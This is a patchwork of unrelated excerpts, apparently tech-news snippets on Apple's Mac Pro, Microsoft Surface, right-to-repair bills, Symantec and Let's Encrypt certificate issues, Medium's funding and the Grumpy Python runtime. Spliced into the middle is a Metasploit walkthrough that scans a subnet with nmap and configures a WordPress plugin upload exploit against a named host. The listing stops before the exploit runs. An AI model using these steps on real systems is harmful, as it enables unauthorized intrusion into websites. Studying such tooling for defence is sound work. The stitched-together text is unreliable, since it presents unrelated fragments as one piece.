And amid all of these delays and misses, Bloomberg reports that the Mac team is in trouble, having "lost clout" with Jonathan Ive and the company’s software team—even though Tim Cook promises Apple hasn't forgotten about the Mac. But you don’t need Mark Gurman’s insider sources when you can spot the wreck from the sky. The Mac Pro—the flagship of Apple desktop hardware—hasn’t been updated since 2013 (not even with a faster processor option).
Microsoft, smelling blood in the water, has given up on phones but focused on the future of the laptop and desktop. Its Surface line is not only selling well to the mainstream, it’s experimenting aggressively to score the Photoshopping, Maya-ing, and AutoDesk-ing market, too. After fighting a 10-year losing battle against Apple on almost everything it does, Microsoft is going for the blind spot Apple now takes for granted: the creative class.
The bills are squarely aimed at the “authorized repair” model that creates aftermarket monopolies dominated by the manufacturers themselves. For example, Apple has never authorized an independent company to repair iPhones, even though hundreds of companies do so every day (its authorized repair program is only for Mac computers).
A security researcher has unearthed evidence showing that three browser-trusted certificate authorities (CAs) owned and operated by Symantec improperly issued more than 100 unvalidated transport layer security certificates. In some cases, those certificates made it possible to spoof HTTPS-protected websites.
By December 8, 2016, Let's Encrypt had issued 409 certificates containing “Paypal” in the hostname; that number is up to 709 as of this morning. Other targets include BankOfAmerica (14 certificates), Apple, Amazon, American Express, Chase Bank, Microsoft, Google, and many other major brands. LetsEncrypt validates only that (at one point in time) the certificate applicant can publish on the target domain; the CA also grudgingly checks with the SafeBrowsing service to see if the target domain has already been blocked as malicious, although they “disagree” that this should be their responsibility. Let's Encrypt’s short position paper is worth a read; many reasonable people agree with it.
This will save the results to the metasploit database
msf > nmap -v -sV 192.168.111.0/24 -oA subnet_1
hosts will list all the hosts found by nmap.
hosts -R will add them to the list of hosts to exploit.
Searching for a WordPress Vulnerability
msf > search name:wordpress
Use an Exploit
This will select an exploit to use:
msf > use exploit/unix/webapp/wp_wysija_newsletters_upload
This will show you the attacks that the exploit will take advantage of:
msf exploit(wp_wysija_newsletters_upload) > show payloads
This will show what software and version will be targeted:
msf exploit(wp_wysija_newsletters_upload) > show targets
0 wysija-newsletter < 2.6.8
Next configure the Exploit
msf exploit(wp_wysija_newsletters_upload) > show options
Module options (exploit/unix/webapp/wp_wysija_newsletter_upload):
Name Current Settings Required Description
---- ---------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST no The target address
RPORT 80 yes The target port
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / no The base path to the wordpress application
VHOST no HTTP server virtual host
0 wysija-newsletters < 2.6.8
Here is where we set all the options:
msf exploit(wp_wysija_newsletters_upload) > set RHOST 22.214.171.124
msf exploit(wp_wysija_newsletters_upload) > set RPORT 443
msf exploit(wp_wysija_newsletters_upload) > set SSL true
msf exploit(wp_wysija_newsletters_upload) > set VHOST myles.life
But I don’t think we’ll grow old together, Medium and I. I suspect it’ll end quite tragic, actually. $132,000,000 is a lot of money after all, and that’s how much venture capital Medium has been dipped in. Before having a prayer or a song about how to turn into that multi-billion-dollar business it must to satisfy the required rate of return.
Grumpy is an experimental Python runtime for Go. It translates Python code into Go programs, and those transpiled programs run seamlessly within the Go runtime. We needed to support a large existing Python codebase, so it was important to have a high degree of compatibility with CPython (quirks and all). The goal is for Grumpy to be a drop-in replacement runtime for any pure-Python project.